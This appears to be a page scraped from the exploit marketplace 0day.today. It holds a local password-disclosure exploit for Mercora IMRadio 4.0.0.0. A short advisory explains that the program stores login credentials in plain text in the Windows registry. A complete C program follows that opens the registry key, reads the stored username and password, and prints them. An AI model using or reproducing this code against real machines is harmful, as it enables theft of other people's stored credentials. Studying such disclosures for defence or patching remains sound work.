0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Mercora IMRadio <= 4.0.0.0 Local Password Disclosure Exploit
============================================================ Mercora IMRadio <= 4.0.0.0 Local Password Disclosure Exploit ============================================================ /*================================================================ Mercora IMRadio 4.0.0.0 password disclosure local exploit by Kozan Discovered & Coded by: Kozan Credits to ATmaCA Web: www.spyinstructors.com Mail: kozan@netmagister.com =====[ Application ]============================================== Application: Mercora IMRadio 4.0.0.0 (and probably prior versions) Vendor: www.mercora.com =====[ Introduction ]============================================= Search, listen, and record any music. With over 2.5 million unique tracks, Mercora is a legal music radio network powered by people, DJs, and artists just like you. Mercora combines Internet streaming, country-specific copyright compliance, and social networking technologies to create the next generation of digital music. Version 4.0 supports friends and family listening, a vastly simplified interface, customized listening, and live music search. =====[ Bug ]====================================================== Mercora IMRadio 4.0.0.0 stores username and passwords in the Windows Registry in plain text. A local user can read the values. HKEY_CURRENT_USER\Software\Mercora\MercoraClient\Profiles Auto.Username = Mercora IMRadio Username Auto.Password = Mercora IMRadio Password =====[ Vendor Confirmed ]========================================= No =====[ Fix ]====================================================== There is no solution at the time of this entry. ================================================================*/ #include <stdio.h> #include <windows.h> #define BUF 100 int main() { HKEY hKey; char Username[BUF], Password[BUF]; DWORD dwBUFLEN = BUF; LONG lRet; if( RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Mercora\\MercoraClient\\Profiles", 0, KEY_QUERY_VALUE, &hKey ) == ERROR_SUCCESS ) { lRet = RegQueryValueEx(hKey, "Auto.Password", NULL, NULL, (LPBYTE)Password, &dwBUFLEN); if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Password,"Not Found!"); lRet = RegQueryValueEx(hKey, "Auto.Username", NULL, NULL, (LPBYTE)Username, &dwBUFLEN); if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Username,"Not Found!"); RegCloseKey(hKey); fprintf(stdout, "Mercora IMRadio 4.0.0.0 password disclosure local exploit by Kozan\n"); fprintf(stdout, "Credits to ATmaCA\n"); fprintf(stdout, "www.spyinstructors.com \n"); fprintf(stdout, "kozan@spyinstructors.com\n\n"); fprintf(stdout, "Username :\t%s\n",Username); fprintf(stdout, "Password :\t%s\n",Password); } else { fprintf(stderr, "Mercora IMRadio 4.0.0.0 is not installed on your system!\n"); } return 0; } # 0day.today [2024-07-05] #